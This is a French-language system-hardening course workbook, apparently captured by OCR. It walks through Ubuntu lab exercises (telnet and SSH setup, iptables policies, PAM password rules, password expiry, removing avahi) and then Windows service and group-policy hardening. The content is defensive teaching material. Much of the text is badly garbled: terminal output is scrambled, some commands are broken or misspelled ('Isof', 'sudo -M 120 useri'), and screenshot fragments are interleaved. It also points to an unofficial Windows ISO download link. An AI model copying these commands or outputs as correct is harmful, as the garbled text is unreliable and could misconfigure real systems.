et:1 http://us.archive.ubuntu.com/ubuntu impish/universe amd64 xinetd amd64 1: 
15.3-1 [168 kB] 
http://us.archive.ubuntu.com/ubuntu impish/universe amd64 telnetd amd64 6 
17-42 [39.1 kB] 
Fetched 147 kB in 6s (24.0 kB/s) 
Selecting previously unselected package xinetd. 


2. Créez ensuite le fichier /etc/xinetd.d/telnet en utilisant la commande : (R ng pase ... 147586 fes and ris a installed. ) 
s | .../xinetd_1%332.3.15.3-1 amd64.deb ... 
sudo nano /etc/xinetd.d/telnet An here = 


3. Ajoutez dans ce fichier les lignes suivantes : - — o 
service telnet 


{ 


disable = no 


N flags = REUSE 

Lu socket_type = stream 
FH it = 

- oe 

[a 


server = /usr/sbin/in.telnetd 
log_on_failure += USERID 


} 
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Étape 1 : Préparation de l’environnement de travail 


4. Redémarrez ensuite le service xinetd en tapant la commande : sudo systemctl restart xinetd.service 


$ sudo nano /etc/xinetd.d/telnet 


$ sudo systemctl restart xinetd.service 


5. Testez le bon fonctionnement du serveur Telnet installé, en essayant de vous connecter en utilisant Telnet depuis la machine hôte vers la machine virtuelle Ubuntu. Cela 
est possible en tapant dans l'invite de commande Windows la commande Telnet @IP où @IP représente l'adresse IP de la machine virtuelle Ubuntu (192.168.0.162) 


to Ubuntu 21.18 (GNU/Linux 5.13.6-35-generic x86_64) 


fhelp.ubuntu.com 
andscape nical.com 


C:\Users\HP>telnet 192.168.0.162 5 updates nul (miiateis 
o see se additional updates rur 
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to the extent permitted by 


Ubuntu comes with ABSOLUTELY NO WARRANTY, 


applicable law. 
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Étape 1 : Préparation de l’environnement de travail 


e Pour installer Netstat, il suffit de taper la commande suivante : sudo apt install net-tools 


$ sudo apt install net-tools 
Reading package lists... Done 
Building dependency tree... Done 
Reading state information... Done 
The following NEW packages will be installed: 
net-tools 
© upgraded, 1 newly installed, © to remove and 180 not upgraded. 
Need to get 193 kB of archives. 
After this operation, 860 kB of additional disk space will be used. 
Get:1 http://us.archive.ubuntu.com/ubuntu impish/main amd64 net-tools amd64 1.6 
0+git20181103.0eebece-iubuntu2 [193 kB] 
Fetched 193 kB in 2s (119 kB/s) 
Selecting previously unselected package net-tools. 
(Reading database ... 147634 files and directories currently installed.) 
Preparing to unpack .../net-tools_1.60+git20181103.Qeebece-1ubuntu2_amd64.deb 


Unpacking net-tools (1.60+git20181103.0eebece-1iubuntu2) 
Setting up net-tools (1.60+git20181103.0eebece-1ubuntu2) 
Processing triggers for man-db (2.9.4-2) 


CRHHHHHHHRHHHHRHHHAHHHHHHHHHHHHHHHHHHHHHHHHHHE 


e Pour tester le bon fonctionnement du netstat, il suffit de taper la commande : sudo netstat 


e Pour vérifier que le service Telnet est actif sur le port 23, il suffit de taper la commande : sudo netstat -tan 


$ sudo netstat -tan 
Active Internet connections (servers and established) 
Proto Recv-Q Send-Q Local Address Foreign Address 
tcp O 127.0.0.53:53 0.0.0.0:* 
tcp 31 9,0,0,0:* 


N 
= 
| 
< 
a. 


6 
tcp6 0 
tcp6 0 
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e Pour installer le serveur ssh, il suffit de taper la commande suivante : sudo apt install openssh-server 


ssh-import-id 


molly-guard 


ver ssh-import-id 


e Pour tester le bon fonctionnement du serveur SSH installé, il suffit d'essayer de se connecter en utilisant SSH depuis la machine hôte vers la machine virtuelle Ubuntu. 
Cela est possible en utilisant l’outil Putty. 


S PuTTY Configuration 
CE osboxes@osboxes: - 


Bas cours for you PuTTY sexan 

Spooky tre destination pos waT W connect 12 
Hog: Nare ior IP scdress) Pot 

52. 168.0.164 2 
Zaren on tye 

Pan Ont (Rem (SSH (Suns 
Loa. sre o deite 2 cored session 
‘Saeed Setas 


Donà Setange 
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Pour installer Lynx, il suffit de taper la commande suivante : sudo apt install Lynx. 


Pour tester Lynx, il suffit de taper la commande : sudo lynx www.google.com. 


Le résultat obtenu démontre que lynx a été bien installé puisqu'il a pu afficher 
l'interface www.google.com 


:-$ sudo apt install Lynx 
Reading package Lists... Done 
Building dependency tree... Done 
Reading state information... Done 
The following additional packages will be installed: 
lynx-common 
The following NEW packages will be installed: 
Lynx Lynx- common 
@ upgraded, 2 newly installed, © to remove and 58 not upgraded. 
Need to get 1,747 kB of archives. 


After this operation, 5,566 kB of additional disk space will be used. 


Do you want to continue? [Y/n] y 


XO 
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Get:1 http://us.archive.ubuntu.com/ubuntu impish/universe amd64 Lynx-common all 2.9.0d 
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EBFORCE 


pe THE CHANGE 


Get:2 http: //us.archive.ubuntu.com/ubuntu impish/universe amd64 Lynx amd64 2.9.8dev.6-3 [715 kB] 


osboxes@osboxes: ~ 


Pour changer la politique par défaut de iptables à DROP, il suffit de taper 
les commandes suivantes : 


e sudo iptables -P INPUT DROP 
e sudo iptables -P OUTPUT DROP 
e sudo iptables -P FORWARD DROP 


Pour vérifier le changement de la stratégie par défaut de ACCEPT a DROP, 
il suffit d'exécuter la commande : sudo iptable -L 


La figure ci-contre illustre les résultats d'exécution des commandes 
précédentes. 


Chain INPUT ioie ACCEPT) 
target prot opt source 


Chain FORWARD (policy ACCEPT) 
target prot opt source 


Chain OUTPUT (policy ACCEPT) 
target prot opt source 
$ sudo iptables 
$ sudo iptables 
$ sudo iptables 
$ sudo iptables 
Chain INPUT (policy DROP) 
target prot opt source 


Chain FORWARD (policy DROP) 


target prot opt source 


Chain OUTPUT (policy DROP) 
target prot opt source 
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destination 
destination 


destination 
-P INPUT DROP 
-P FORWARD DROP 
-P OUTPUT DROP 
-L 


destination 


destination 


destination 
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Étape 2 : Configuration du pare-feu iptables 
e La première condition (A) de la stratégie définie est la suivante : 


A. La machine Ubuntu doit être capable d'envoyer des paquet ICMP de type echo-request et de recevoir des paquets ICMP de type echo-reply (un tel message 
doit être journalisé, tout en laissant iptables préfixer les messages de journal avec la chaîne "echo reply received"). 


e Pour implémenter une telle condition, il suffit de taper les commandes suivantes dans l’ordre donné : 
e sudo iptables -A INPUT -p icmp --icmp-type echo-reply -j LOG --log-prefix "echo reply received " 
> Cette ligne de commande permet de journaliser les requêtes ICMP de type echo-reply avec un préfix "echo reply received". 
e sudo iptables -A INPUT -p icmp -m state --state established -j ACCEPT 
> Cette ligne de commande permet d'accepter les paquets ICMP faisant partie d'une connexion déjà établie. 
e sudo iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT 
> Cette ligne de commande permet d’accepter la sortie des paquets ICMP de type echo-request. 


e La figure ci-dessous illustre l'exécution des commandes précédentes : 


$ sudo iptables -A INPUT -p icmp --icmp-type echo-reply -j LOG --log-prefix "ec 
ho reply received" 

$ sudo iptables -A INPUT -p icmp -m state --state established -j ACCEPT 

$ sudo iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT 
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e Pour vérifier l'efficacité de la configuration effectuée, il suffit de : 
e Lister les règles configurées dans le pare-feu ; 
e Tester un ping sortant de la machine Ubuntu vers n'importe quel adresse IP ; 
e Vérifier la journalisation des requêtes ICMP de type echo-reply avec le préfix défini "echo reply received ; 


e Les résultats illustrés dans les deux figures ci-dessous illustrent que la configuration effectuée répond exactement aux exigences demandées dans la 


stratégie de sécurité : 


:-$ sudo iptables -L 
Chain INPUT (policy DROP) 
prot opt source destination 
icmp -- anywhere anywhere icmp echo-reply LOG level warning 
"echo reply received" 
icmp -- anywhere anywhere state ESTABLISHED 


: $ sudo tail -f /var/log/syslog 
»xes systemd[1]: Started Network Manager Script Dispatcher Service. 
es whoopsie[761]: [20:23:40] Cannot reach: https aisy.ubuntu. com 
systemd[1]: NetworkManager-dispatcher.service: Deactivated successfully. 
temd-resolved[560]: Grace period over, resuming full feature set (UDP 


92.168.0.1. 
s kernel: [ 779.688735]|echo reply receivedIN=enp0s3 OUT= MAC=08:00:27:36 
5: 5:68:80 SRC=192. 168. =19Z, 168.0, 162 PREC=0x00 TTL=6 
ICMP TYPE=0 CODE=8 ID=5 S 


osboxes kernel: | 780,517 


+EDNS6) for DNS s 
Mar 15 26:25:41 os 


© < 
< m 
5 


Chain FORWARD (policy DROP) 
target prot opt source destination 


E 
6 9:27:36 
= 5.0. 102 TTL=6 


Chain OUTPUT (policy DROP) 

target prot opt source destination ` : 

ACCEPT icmp -- anywhere anywhere cmp echo-request eat Se 
E icmp yw anyw icmp e] lecho reply receivedIN=enp0s3 OUT= 08:00:27:36 

D ` 8 x Y F F. je = d = 


LEN=84 TOS=0x00 


$ sudo ping 192.168.0.1 
G 192.168.0.1 (192.168.0.1) 56(84) bytes of data. 
s from 192.168.0.1: icmp seq=1 ttl=64 e=9 
S from 192.163.0.1: icmp seq=2 ttl=64 
from 192.168.0.1: icmp s ttl=64 
from 192.168.0.1: icmp s ttl=64 
from 192.168.0.1: icmp ttl=64 
from 192.168.0.1: icmp ttl=64 time=5,26 


22194 


N=enp0s3 OUT= MAC=08:00:27: 
U — 


y receiv 
ST=192. 1680-162 tEN=84 T0S=0x00 PREC=0x00 


25: es kernel: [ 52 echo reply receivedIN=enpOs3 OUT= MAC=08:00:2 
:08:66:41:b5: 5:68:80 SRC=192.1 .1 DST=192.168.8.162 LEN=84 TOS=68x08 PREC=0x900 
4 10=21839 PROTO=ICMP TYPE=0 CODE=0 ID=5 S 
#2 784,5 29] echo reply receivedIN=enpOs3 OUT= MAC=08:¢ 
75:68:60 SRC=192.168.9.1 DST=192.168.6.162 LEN=84 T0S=0x08 PREC= 
iP TYPE=@ CODE=8 ID=-5 SEQ= 


- 192.168.0.1 ping statistics -- 
6 packets transmitted, 6 received, 0% . loss, time 5009ms 
rtt min/avg/max/mdev 3.443/19.737/9 397 ms 
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Etape 2 : Configuration du pare-feu iptables 


e La deuxième condition (B) de la stratégie définie est la suivante : 
B. La machine Ubuntu doit être capable de générer des messages ICMP "destination-unreachable" 
e Pour implémenter une telle condition, il suffit de taper la commande suivante : sudo iptables -A OUTPUT -p icmp --icmp-type destination-unreachable -j ACCEPT 


e La figure ci-dessous illustre le résultat de l'exécution de la commande précédente : 


:-$ sudo iptables -A OUTPUT -p icmp --icmp-type destination-unreachable -j ACCEPT 
:-$ sudo iptables -L 
Chain INPUT (policy DROP) 
target prot opt source destination 
LOG icmp -- anywhere anywhere icmp echo-reply LOG level warning 
prefix "echo reply received" 
ACCEPT icmp -- anywhere anywhere state ESTABLISHED 


Chain FORWARD (policy DROP) 
target prot opt source destination 


Chain OUTPUT (policy DROP) 

target prot opt source destination 

ACCEPT icmp -- anywhere anywhere icmp echo- request 

ACCEPT icmp -- anywhere anywhere icmp destination-unreachable 


ana Ar nn 
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Étape 2 : Configuration du pare-feu iptables 


e La troisième condition (C) de la stratégie définie est la suivante : 
C. La machine virtuelle peut se connecter à des serveurs Web à l'aide de connexions HTTP sécurisées, à l'exception du site web www.facebook.com. 


e Pour identifier l'adresse IP du site web www.facebook.com, il suffit de taper la commande : nslookup www.facebook.com. 


sers\HP>nslookup www. facebook.com 


Velela 
A 


e Pour implémenter la condition (C), il suffit de taper les commandes suivantes dans l’ordre donné : 
e sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT 
e sudo iptables -A OUTPUT -p udp -j ACCEPT 
e sudo iptables -A OUTPUT -d 31.13.69.35 -p tcp --dport 443 -j DROP 
e sudo iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT 
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e sudo iptables -A INPUT -p tcp -m state --state established -j ACCEPT 
e sudo iptables -A INPUT -p udp -j ACCEPT 


Les figures ci-dessous illustrent l'exécution des commandes précédentes et la configuration obtenue du pare-feu iptables : 


5 sudo 
5 sudo 


DROP 
sudo 
: $ sudo 
Chain INPUT (policy DROP) 
target prot opt source 
LOG icmp -- anywhere 
G level warning prefix "echo 
ACCEPT icmp -- anywhere 


Chain FORWARD (policy DROP) 
target prot opt source 


Chain OUTPUT (policy DROP) 
target prot opt source 
ACCEPT icmp -- anywhere 
ACCEPT icmp -- anywhere 
nreachable 
ACCEPT 
ACCEPT 


tcp 
udp 


anywhere 
anywhere 


iptables 
iptables 
$ sudo iptables 


iptables 
iptables -L 


-A OUTPUT 
-A OUTPUT 
-A OUTPUT 


-p udp -j ACCEPT 


-A OUTPUT -p tcp 


destination 

anywhere 
reply received' 

anywhere 


destination 


destination 
anywhere 
anywhere 


anywhere 
anywhere 


-d 31.13.69.35 -p tcp 


-p tcp --dport 80 -j ACCEPT 


--dport 443 -j 


--dport 443 -j ACCEPT 


icmp echo-reply LO 


state ESTABLISHED 


icmp echo-request 
icmp destination-u 


tcp dpt:http 


:-$ sudo iptables -A INPUT -p udp -j ACCEPT 


:-$ sudo iptables -A INPUT -p tcp -m state --state established - 


j ACCEPT 


:-$ sudo iptables -L 


Chain INPUT (policy DROP) 
prot opt source 
icmp -- anywhere 

G level warning prefix “echo 

ACCEPT icmp -- anywhere 

ACCEPT udp anywhere 

ACCEPT tcp anywhere 


Chain FORWARD (policy DROP) 
target prot opt source 


Chain OUTPUT (policy DROP) 
prot opt source 
icmp -- anywhere 
icmp -- anywhere 


anywhere 
anywhere 
anywhere 


tcp dpt:https 


ACCEPT tcp anywhere 


destination 
anywhere 
reply received" 
anywhere 
anywhere 
anywhere 


destination 


destination 
anywhere 
anywhere 


anywhere 
anywhere 
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icmp echo-reply LO 
State ESTABLISHED 


State ESTABLISHED 


icmp echo-request 
icmp destination-u 


tcp dpt:http 


edge-star-mini-shv-01-pmol. facebook. com 


anywhere 


tcp dpt:https 
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Etape 2 : Configuration du pare-feu iptables 


e Pour vérifier l'efficacité de la configuration effectuée, il suffit d’ouvrir n’importe quel site web (a l'exception du site web www.facebook.com) en utilisant l'outil lynx 


La figure ci-dessous illustre le résultat de l'exécution de la commande sudo lynx www.google.com. Le résultat illustré montre qu’il est possible d’avoir accès au site lynx 
www.google.com depuis la machine Ubuntu 


osboxes@osboxes: ~ 
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Etape 2 : Configuration du pare-feu iptables 


e La dernière condition (D) de la stratégie définie est la suivante : 


D. Toutes les connexions TCP de l'hôte principal vers la machine Ubuntu sont possibles, à l'exception des connexions Telnet. 
e Pour implémenter une telle condition, il suffit de taper les commandes suivantes dans l’ordre donné : 


e sudo iptables -A INPUT -p tcp --dport 23 -j DROP 


> Cette ligne de commande permet d'empêcher toute connexion Telnet (sur le port 23) vers la machine Ubuntu. 


e sudo iptables -A INPUT -p tcp -j ACCEPT 


> Cette ligne de commande permet d’accepter toute connexion TCP vers la machine Ubuntu. 


e sudo iptables -A OUTPUT -p tcp -m state --state established -j ACCEPT 


> Cette ligne de commande permet d’accepter les paquets TCP faisant partie d'une connexion déjà établie. Cette ligne est essentielle puisqu’elle donne la 
possibilité a la machine Ubuntu de répondre aux requétes TCP faisant partie d’une connexion établie. 
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Les figures ci-dessous illustrent l’exécution des commandes précédentes et la configuration obtenue du pare-feu iptables 


$ sudo -State established 


iptables -A OUTPUT -p tcp -m state - 


:-$ sudo iptables -A INPUT -p tcp 
:-$ sudo iptables -A INPUT -p tcp 
:-$ sudo iptables -L 


--dport 23 -j DROP 


-j ACCEPT -j ACCEPT 


$ sudo iptables -L 


Chain INPUT (policy DROP) 
target prot opt source 
LOG icmp -- anywhere 
G level warning prefix “echo 
ACCEPT icmp -- anywhere 
ACCEPT udp anywhere 
ACCEPT tcp anywhere 
DROP tcp anywhere 
ACCEPT tcp anywhere 


Chain FORWARD (policy DROP) 
target prot opt source 


Chain OUTPUT (policy DROP) 
target prot opt source 
ACCEPT icmp -- anywhere 
ACCEPT icmp -- anywhere 
nreachable 
ACCEPT 
ACCEPT udp 
DROP tcp 

tcp dpt:https 
ACCEPT cco 


anywhere 
anywhere 
anywhere 


tcp 


anywhere 


destination 
anywhere 
reply received’ 
anywhere 
anywhere 
anywhere 
anywhere 
anywhere 


destination 


destination 
anywhere 
anywhere 


anywhere 
anywhere 


icmp echo-reply LO 
state ESTABLISHED 


state ESTABLISHED 
tcp dpt: telnet 


icmp echo-request 
icmp destination-u 


tcp dpt:http 


edge-star-mini-shv-91-pmol. facebook. com 


anywhere 


tcp dpt:https 


Chain INPUT (policy DROP) 
prot opt source 
icmp -- anywhere 

G level warning prefix "echo 
icmp -- anywhere 
udp anywhere 
tcp anywhere 
tcp anywhere 
tcp anywhere 


Chain FORWARD (policy DROP) 
target prot opt source 


Chain OUTPUT (policy DROP) 
prot opt source 
icmp -- anywhere 
icmp -- anywhere 


tcp 
udp 

tcp -- 
tcp dpt:https 
ACCEPT tcp 
ACCEPT tcp 


anywhere 
anywhere 
anywhere 


anywhere 
anywhere 


destination 
anywhere 
reply received" 
anywhere 
anywhere 
anywhere 
anywhere 
anywhere 


destination 


destination 
anywhere 
anywhere 


anywhere 
anywhere 


icmp echo-reply LO 
state ESTABLISHED 


state ESTABLISHED 
tcp dpt: telnet 


icmp echo-request 
icmp destination-u 


tcp dpt:http 


edge-star-mini-shv-61-pmol. facebook. com 


anywhere 
anywhere 


tcp dpt:https 
state ESTABLISHED 
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Étape 2 : Configuration du pare-feu iptables 


e Pour vérifier l'efficacité de la configuration effectuée, il suffit de : 


e Tester d'établir une connexion SSH avec la machine Ubuntu. Les figures ci-dessous démontrent qu’il est possible d'établir une connexion SSH. 


@ PuTTY Configuration EP osboxes@osboxes: ~ 


ategory: 
B- Session Basic options for your PuTTY session 


Logging Specify the destination you want to connect to 


B- Terminal 
F L- Keybo = Host Name (or IP address) Port 


Bell 192.168.0.162 2 
Features Connection type: 
6- Window ORaw O Tene ORlogn @SSH © Serial 


— Load, save or delete a stored session 


Translation Saved Sessions 
Selection | 
Colours Default Settings 
B- Connection 
Data 
Proxy 
Telnet 
Rlogin 
H- SSH 
Serial 


Close window on exit: 
O Aways Never @Only on clean exit 


| Open || Cancel 


e Essayez d'établir une connexion Telnet avec la machine Ubuntu. La figure ci-dessous démontre qu'il est impossible d'établir une connexion Telnet : 
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SÉCURISER LES SYSTÈMES LINUX 


Compétences visées : 


e Appliquer les bonnes pratiques et la configuration des outils 
nécessaires pour sécuriser un système d'exploitation 


Recommandations clés : 


e  Maitriser les bonnes pratiques de sécurisation d’un système 
d'exploitation Linux 
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CONSIGNES 


Pour le formateur 


Vapprenant doit être capable d’appliquer les configurations et les bonnes pratiques 
de sécurisation d’un système d’exploitation Linux en partant des stratégies de 
sécurité définies dans un énoncé. 


Pour l'apprenant 


Il est recommandée de maitriser les bonnes pratiques de sécurisation d’un système 
d'exploitation Linux 


Il est également recommandé de suivre les étapes décrites dans l'énoncé 


Conditions de réalisation : 
VirtualBox installé 


Une machine Virtuelle Ubuntu 


Critères de réussite : 
Désactiver avec succès les services inutiles 


Définir avec succès une stratégie des mots de passes utilisateurs 
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Sécuriser les systèmes Linux 


e L'objectif de cette activité est d'appliquer un ensemble de bonnes pratiques de configuration permettant de durcir un système d'exploitation Linux afin d'éliminer de 
nombreuses surfaces d'attaques. 


e Pour ce faire, les mesures de sécurité à appliquer dans cette activité sont comme suit : 


1. Désactiver les services inutiles : 


e Lister les services actives en utilisant la commande : Isof -i ; 


e Désactiver les services inutiles en utilisant la commande : apt-get remove <nom-service>. 


2. Définir un modèle de sécurité des mots de passe utilisateurs 
e Ajouter un utilisateur User1 et lui attribuer un mot de passe, en tapant les commandes suivantes : 
e sudo adduser user1 


e sudo passwd user1 
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Sécuriser les systèmes Linux 


Sécuriser les systèmes Linux 


e Modifier le fichier /etc/pam.d/common-password pour configurer les stratégies de mot de passe en utilisant les paramètres suivants : 


retry: Nombre de fois consécutives qu'un utilisateur peut entrer un mot de passe incorrect.. Choisir 4 comme valeur. 
minlen: Longueur minimale du mot de passe. Choisir 9 comme valeur. 

Icredit: Nombre minimal de lettres minuscules. Choisir 2 comme valeur 

ucredit: Nombre minimal de lettres majuscules. Choisir 2 comme valeur 


ocredit: Nombre minimal de symboles. Choisir 1 comme valeur 


e Modifier le mot de passe de l'utilisateur user1 pour tester la nouvelle configuration 


2. Définir une période d'expiration d’un mot de passe 


e Modifier le fichier /etc/login.defs pour définir la période d'expiration d’un mot de passe comme suit : 
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PASS_MAX_DAYS 120 > Nombre de jours maximum de validité d’un mot de passe est 120 jours 
PASS_MIN_DAYS 0 > Nombre de jours minimal pour changer un mot de passe est 0 jours 


PASS_WARN_AGE 8 > Nombre de jours avant l’expiration pour alerter les utilisateur est 8 jours 


e Vérifier si la période d’expiration définie est appliquée à l'utilisateur user1 en exécutant la commande sudo chage -l user1 
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Sécuriser les systèmes Linux 


e Utiliser les commandes suivantes pour définir la période d expiration définie précédemment pour user1 : 
e sudo chage -M 120 user1 
e sudo chage -m 0 user1 
e sudo chage -W 8 user1 


e Vérifier de nouveau la période d’expiration définie pour l'utilisateur user1 en exécutant la commande sudo chage -l user1 
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Activité 3 


Correction 


N 
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m 
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Désactiver les services inutiles : 


COMMAND 

systemd-r 
systemd-r 
avahi-dae 
avahi-dae 


avahi-dae 
avahi-dae 
NetworkMa 
cupsd 
cupsd 
cups-brow 


PID 
558 
558 
596 
596 
596 
596 
599 
728 
728 
839 


KO 
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Pour lister les services actifs dans un système Linux, exécutez la commande sudo Isof-i : 


$ sudo lsof -i 

USER 
systemd-resolve 
systemd-resolve 
avahi 

avahi 

avahi 

avahi 

root 

root 

root 

root 


TYPE 
IPv4 
IPv4 
IPv4 
IPv6 
IPv4 
IPv6 
IPv4 
IPv6 
IPv4 
IPv4 


DEVICE SIZE/OFF 


17376 
AS 
18334 
18335 
18336 
18337 
18780 
18882 
18883 
18999 


oto 
oto 
oto 
oto 
oto 
Oto 
oto 
oto 
oto 
oto 


NODE 
UDP 
TCP 
UDP 
UDP 
UDP 
UDP 
UDP 
TCP 
TCP 
UDP 


NAME 

localhost:domain 
localhost:domain (LISTEN) 
*:mdns 

*:mdns 

*:59135 

*:54072 

osboxes:bootpc-> gateway:bootps 
ip6-localhost:ipp (LISTEN) 
localhost:ipp (LISTEN) 
=:631 
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D'après le résultat affiché dans la figure ci-dessus, nous pouvons remarquer la présence du service avahi-daemon qui pourra être désinstallé ou désactivé. 
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Correction 
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Désactiver les services inutiles : 


Pour désinstaller le service avahi-daemon, exécutez la commande sudo apt-get 
remove avahi-daemon 


$ sudo apt-get remove avahi-daemon 
Reading package lists... Done 
Building dependency tree... Done 
Reading state information... Done 


The following packages were automatically installed and are no longer required: 


libavahi-core7 libreoffice-ogltrans 
Use 'sudo apt autoremove' to remove them. 
The following packages will be REMOVED: 
avahi-daemon avahi-utils ipp-usb libnss-mdns 
© upgraded, © newly installed, 4 to remove and 167 not upgraded. 
After this operation, 6 225 kB disk space will be freed. 
Do you want to continue? [Y/n] y 
database ... 155378 files and directories currently installed.) 
Llibnss-mdns:amd64 (0.14.1-2build1) 
avahi-utils (0.8-Subuntu4) 
ipp-usb (0.9.19-2ubuntu1) 
avahi-daemon (0.8-5ubuntu4) 
Created symlink /run/systemd/system/avahi-daemon.service — /dev/null. 
Removed /run/systemd/system/avahi-daemon.service. 
Processing triggers for man-db (2.9.4-2) 
Processing triggers for dbus (1.12.20-2ubuntu2) 
Processing triggers for Libc-bin (2.34-Oubuntu3) 


KO 


OFPPT 


WEBFORCE » 


BE THE CHANGE 


Listez de nouveau les services actifs en exécutant la commande sudo Isof -i 


SIZE/OFF NODE 
UDP | 
TCP l 


UDP 
TCP 
TCP 1 
UDP 
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Ces figures illustrent l’ajout d’un nouveau utilisateur user1 et le test d’utilisation de cet utilisateur 


$ sudo adduser userl 

Adding user ‘userl' ... 
Adding new group userl' (1001) 
Adding new user userl' (1001) with group userl' 
The home directory /home/userl' already exists. Not copying from /etc/skel'. 
New password: 
BAD PASSWORD: The password is shorter than 8 characters :-$ sudo su userl 
Retype new password: $ exit 
passwd: password updated successfully 
Changing the user information for userl ~$ F 
Enter the new value, or press ENTER for the default 5 

Full Name []: userl 

Room Number []: 1 

Work Phone []: 

Home Phone []: 

Other []: 
Is the information correct? [Y/n 
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Définir un modèle de sécurité des mots de passe utilisateurs 


e Pour éditer le fichier fichier /etc/pam.d/common-password, il suffit d'exécuter la commande sudo nano fichier /etc/pam.d/common-password 


$ sudo nano /etc/pam.d/common-password 


La figure ci-dessous illustre la configuration par défaut du fichier /etc/pam.d/common-password 


GNU nano 5.6.1 /etc/pam.d/common-password 


password requisite pam pwquality.so retry=3 | 
password [success=2 default=ignore] pam unix.so obscure use authtok 
password sufficient pam sss.so use authtok 


password requisite pam deny.so 


password required pam permit.so 
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password optional pam gnome keyring.so 
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La figure ci-dessous illustre la nouvelle configuration du fichier /etc/pam.d/common-password qui répond à la stratégie définie dans l'énoncé : 


requisite pam_pwquality.so retry=4 minlen=9 ucredit=-2 lcredit=-2 ocredit=- iff 
password success= pam_unix.so obscure use au 


password sufficient pam_sss.so use_authtok 


password requisite pam_deny.so 


Cette figure illustre la modification du mot de passe de l'utilisateur user1. Le résultat illustré montre que la nouvelle configuration est bien appliqué 


sudo passwd 
New password: 
BAD PASSWORD: The password contains less than 2 uppercase letters 
Retype new password: 
Sorry, passwords do not match. 
New password: 
BAD PASSWORD: The password contains less than 2 lowercase letters 
Retype new password: 
Sorry, passwords do not match. 
New password: 
BAD PASSWORD: The password contains less than 1 non-alphanumeric characters 
Retype new password: 
Sorry, passwords do not match. 
New password: 
BAD PASSWORD: The password is shorter than 9 characters 
Retype new password: 
Sorry, passwords do not match. 
passwd: Have exhausted maximum number of retries for service 
passwd: password unchanged 


Activité 3 


Correction 


Définir une période d'expiration d’un mot de passe 


La figure ci-dessous illustre la configuration par défaut du fichier /etc/login.defs 


PASS_MAX_DAYS 
PASS_MIN_DAYS 
PASS_WARN_AGE 


La figure ci-dessous illustre la nouvelle configuration du fichier /etc/login.defs qui répond aux exigences de l'énoncé 


PASS_MAX_DAYS 
PASS_MIN_DAYS 
PASS_WARN_AGE 
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En exécutant la commande sudo chage -l user1 , nous pouvons remarquer que la configuration définie précédemment n'est pas applicable pour les anciens utilisateurs. 


$ sudo chage -l user1 
Last password change 
Password expires 
Password inactive 


Account expires 

Minimum number of days between password change 
Maximum number of days between password change 
Number of days of warning before password expires 


mars 26, 2022 
never 

never 

never 

0 

99999 

7 


L'application de la configuration d’une période d’expiration d’un mot de passe à un ancien utilisateur en utilisant la commande chage 


$ sudo -M 120 useri 
$ sudo -m © useri 
$ sudo -W 8 user1 
- sudo -l user1 
Last password change 
Password expires 


Password inactive 


Account expires 

Minimum number of days between password change 
Maximum number of days between password change 
Number of days of warning before password expires 


$ 


mars 26, 2022 
juil. 24, 2022 
never 
never 
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SÉCURISER LES SYSTÈMES WINDOWS 


Compétences visées : 


e Appliquer les bonnes pratiques et la configuration des outils 
nécessaires pour sécuriser un système d'exploitation 


Recommandations clés : 


e  Maitriser les bonnes pratiques de sécurisation d’un système 
d'exploitation Windows 


CONSIGNES 
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1. Pour le formateur 


° Vapprenant doit être capable d'appliquer les configurations et les bonnes pratiques 
de sécurisation d’un système d'exploitation Windows en partant des stratégies de 
sécurité définies dans un énoncé. 


2. Pour l’apprenant 


° Il est recommandée de maitriser les bonnes pratiques de sécurisation d’un système 
d'exploitation Windows 


° Il est également recommandée de suivre les étapes décrites dans l'énoncé 


3. Conditions de réalisation : 


° VirtualBox installé 


° Une machine virtuelle Windows. Un fichier ISO d'installation de Windows 10 pourra 
être téléchargé à partir du lien suivant : https://tb.rg- 


adguard.net/dl.php?g0=7119d4be 


4. Critères de réussite : 


° Configurer avec succès les stratégies de sécurité définies dans l'énoncé de l’activité 


e s L | xO = 
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Introduction 


e L'objectif de cette activité est d'appliquer un ensemble de bonnes pratiques de configuration permettant de durcir un système d'exploitation Windows afin d'éliminer de 
nombreuses surfaces d'attaques. 


e Pour ce faire, les mesures de sécurité à appliquer dans cette activité sont comme suit : 


1. Désactiver les services inutiles et renforcer le niveau de sécurité des services existants ; 
2. Limiter les connexions réseau ; 

3. Limiter les risques liés à l'usage de médias amovibles ; 

4. Définir un modèle de sécurité pour les comptes système ; 

5. Définir une stratégie d’audit ; 

6. Exécuter la restauration du système et créez un point de restauration ; 


7. Configurer des règles de sécurité pour le pare-feu Windows. 
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Etape 1 : Désactiver les services inutiles et renforcer le niveau de sécurité des services existants 


e L'objectif de cette étape est de désactiver les services qui sont inutiles pour le fonctionnement du système. Cela permet de réduire efficacement la surface d’attaque. 


e Pour afficher la liste des services activés dans un système Windows, il suffit de lancer services.msc (taper services.msc dans la barre de recherche Windows). Une 
interface affichant les différents services ainsi que leurs états (désactivés, lancés manuellement ou automatiquement). 


e En parcourant la liste des services affichez dans cette interface, désactivez ceux qui ne sont pas utiles. 
e Exemples de services inutiles qui doivent être désactivés : 

e Téléphonie 

e Télécopie 

e Carte à puce 

e Service de prise en charge Bluetooth 

e Spouleur d'impression 

e Service initiateur iSCSI Microsoft 

e Partage de connexion Internet 


e Routage et accès distant 


e Travail demandez : Essayez au moins de désactivez les services inutiles cités précédemment.. 
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Étape 1 : Désactiver les services inutiles et renforcer le niveau de sécurité des services existants 


e Certaines services ne peuvent pas être désactivé. Il est possible de renforcer leurs niveaux de sécurité au 
travers de la politique locale du poste. 


e Dans cette activité, vous êtes chargés de renforcer la sécurité de l’authentification à distance. Pour ce 
faire : 


e Lancez gpedit.msc (tapez gpedit.msc dans la barre de recherche Windows) 


e Allez dans : Configuration ordinateur > Paramètres Windows > Paramètres de sécurité--> 
Stratégies locales > Options de sécurité 


e Parcourez la liste et sélectionner Sécurité réseau : niveau d'authentification du LAN Manager 


e Examinez la liste fournie pour les différents niveau d’authentification fournis. Pour avoir une idée 
sur la signification de chaque niveau de sécurité, tapez le menu Expliquer (comme illustré dans la 
figure ci-dessous) 


e Attribuez comme niveau de sécurité la valeur « uniquement NTLM v2, Refuser LM » 


e Validez le choix 
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Propriétés de : Sécurité réseau : niveau d'authentification ... 


Paramètre de sécurité locale Expliquer 


Sécurité réseau : niveau d'authentification LAN Manager 


Ce paramètre de sécurité détermine quel est le protocole 
d'authentiication de stimulation/réponse des ouvertures de | 


d'authentification qu'acceptent les serveurs, de la façon 
suivante : 


